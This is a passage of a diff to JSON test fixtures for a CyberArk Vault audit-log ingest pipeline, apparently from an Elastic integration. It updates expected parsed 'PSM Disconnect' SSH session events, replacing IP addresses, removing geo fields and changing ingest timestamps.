18000000000, - "ingested": "2021-06-09T10:24:31.624812Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813806700Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -966,39 +890,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1015,7 +918,7 @@ }, "@timestamp": "2021-03-14T13:51:35.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1026,16 +929,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:51:35Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1047,14 +949,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "47747796-03e1-4a11-af39-ab56c00e7732", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:54" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1066,9 +968,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 14 06:51:35", "desc": "PSM Disconnect" @@ -1080,8 +982,8 @@ "event": { "severity": 2, "duration": 54000000000, - "ingested": "2021-06-09T10:24:31.624814600Z", - "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813812100Z", + "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 